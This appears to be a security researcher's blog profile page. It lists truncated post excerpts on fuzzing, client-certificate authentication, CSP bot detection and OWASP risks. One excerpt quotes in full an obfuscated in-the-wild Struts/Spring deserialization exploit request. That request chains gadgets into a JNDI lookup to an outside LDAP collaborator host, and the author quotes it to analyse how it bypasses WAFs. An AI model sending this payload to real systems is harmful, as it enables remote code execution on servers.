We don’t need that crazy acceleration for Tesla cars and Hyperloop for daily life in a few words. It’s a lot of fun, for sure, and some marketing feature that puts electric cars in supercars bucket. At the same time, that crazy acceleration train people to take overloads. In my personal experience of Tesla Model 3 performance for two years, I have to say that it’s not just fun to hit the gas pedal in full, but also training for vestibular. It works for you and your passengers.
Look, it’s logical. The future of Earth transportation is definitely should be…
Fuzzing is everything ;) It’s the most useful and resultative hacking technique for sure. At the same time, fuzzing is not just random hitting applications or binaries with some random bytes.
It’s more about ideas, a deep understanding of data formats and application flows, technology stacks, and a lot of other things. It’s more about assumptions on how the particular application was designed and made, than random.
In these series of posts, I wanna share some experience on JSON fuzzing that I’ve achieved for the last 12 years of security audits.
Data types mutations
First of all, JSON is a serialization format, it’s…
I’ve just found some variant of Struts exploit that surprised me by obfuscation technique:
GET /?%01%00java.util.HashMa%f0%01%02%01%01org.springframework.aop.target.HotSwappableTargetSourc%e5%01%01%02%ef%01org.springframework.aop.aspectj.autoproxy.AspectJAwareAdvisorAutoProxyCreator$PartiallyComparableAdvisorHolder%01%01%03org.springframework.aop.aspectj.AspectJPointcutAdviso%f2%01%01%04org.springframework.aop.aspectj.AspectJAroundAdvic%e5%01%00%00%00%01%05%cc%01org.springframework.aop.aspectj.annotation.BeanFactoryAspectInstanceFactory%01%00%01%06org.springframework.jndi.support.SimpleJndiBeanFactor%f9%01%01%07org.springframework.jndi.JndiTemplat%e5%01%00%01%08org.apache.commons.logging.impl.NoOpLo%e7%01%01%08%01%01%01%00%01%00%01%09java.util.HashSe%f4%01%01%03%01%c9%03ldap%3a%2f%2fxxxxxxxxxxxxxxxxxxxxxxxxx.burpcollaborator.net%2f%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%01%00%01%00%0e%00%00%01%01%0ajava.lang.Objec%f4%00%00%00%00%00%00%01toStrin%e7%01%01%00%00%00%00%00%00%01%01%03%01%01%01%01%0bcom.sun.org.apache.xpath.internal.objects.XStrin%e7%01%03%01%85%ee%ac%a5%00%17%10%00%01%01%13=1 HTTP/1.1This is %01%00 obfuscation, plus Unicode multibyte encoding.
Do you have any thoughts on what’s it? It seems like Java is avoiding %01 bytes from Unicode sequences, isn’t it?
I’m pretty sure, that the only way to use such kind of comprehensive obfuscation is to bypass signatures for WAFs/IPS/IDS/etc. So, it seems like somebody really knows how to cook bypasses for deserialization exploits at least.
BTW, which Spring vulnerability takes exploits right from the URI? Or this is a new https://nvd.nist.gov/vuln/detail/CVE-2019-9212 Hessian RCE exploited in the wild?
In the first story, I described some issues related to client certificates authentication implementations in environments with load balancers. This time I’d like to mention some typical issues in custom certificate validation processes when a developer is doing this itself in application code.
Let’s formalize the task as a custom authentication based on user certificates. Now, let’s divide this task from the architecture perspective:
- all the crypto things should be solved by 3-rd party libraries
- all the business logic should be implemented by yourself
Or more technical:
- PKI library will check the certificate to give you some details about the…
The first research related to this technique, as I believe dated by March 2013. It described the way how to deal with the escapeshellarg() and other scaping functions used to sanitize data at shell calls like system(), passthru(), exec() and others. This technique became very popular later, especially after a lot of sendmail exploits used it.
In my last (and the first, BTW) Twitch stream I tried to find a similar issue at Symfony (as the part of Laravel) but found only DoS way to exploit it for 30 minutes of research. …
Bots are noisy, like really. And dangerous as well, especially if they can do crawling and increase usage by legitimate operations like items catalog retrieve in the case of e-commerce. I mean, we have a lot of reasons to do not like bots and count this problem as a cybersecurity threat, which should not be explained in details.
In this post, I’d like to share an idea on how to detect some bots based on non-browser engines. As you can see in the title, it’s based on CSP.
Why CSP?
The main reason for this research (most likely brainstorm) was an ability…
I love Burp Suite, like really. It’s the most convenient tool to visualize what’s happening with apps, what requests look like and to test simple things like XSS injection.
At the same time, it’s really hard for me to do something more complicated, like implementing custom fuzzing with having to put all the markers into the Intruder. It’s unbelievably hard to make my own detects and run them in my own way. At the same time, fuzzing is a super important application testing technique. Recently I mentioned avoiding fuzzing as #5 in my Top 5 security audit fails https://medium.com/@d0znpp/top-5-my-own-security-audit-fails-d17320bbb980
Although…
Sometimes we need to improve web authentication by client certificates. It’s much better than passwords, allows to enable 2nd factor because of hardware keys and just sounds so strong, isn’t it? ;)
Let’s look inside it to understand how secure is it and what to check to be sure, that you didn’t reduce the security level of your company when implemented client certificate authentication. As always, it’s not a cryptography-related question, but an implementation risk. In this article, I’ll sum up all of our penetration testing experience to make client certificate authentication security checklist.
Certificate status headers spoofing
Load balancers set HTTP headers for…
I have been in application security since 2009. Since that time I was involved in more than 300 different projects and sometimes even discovered new things like SSRF or the first XXE OOB FTP exploitation. Today I’d like to talk about my fails during my 300+ projects to ensure you don’t repeat my mistakes. Interestingly, all of the same fiascos were repeated time and time again by the many security folks I’ve talked to. So, here they are.
- OR 1=1 payload. Never use it, like NEVER. Just because one day, like me, you will find an injection into UPDATE query…
This is the last part of my trilogy about OWASP Top-10 2017 risks. Two previous parts (one and two) described A1-A6 risks and this time I’d like to not just explain A7-A10 risks but also draw an intersection or overlap venn diagram of them. I hope this diagram would clarify why the questions about “OWASP Top-10 coverage” are inherently inaccurate.
Let’s start with the A7-A10 then.
A7. XSS (Cross Site Scripting)
I’m sure that everybody knows what this is.. But once again, this XSS risk in OWASP does not necessarily mean there is an XSS vulnerability under the covers. The same A7 risk can happens…
Ivan Novikov
CEO at Wallarm. Application security platform to prevent threats and discover vulnerabilities in a real-time.
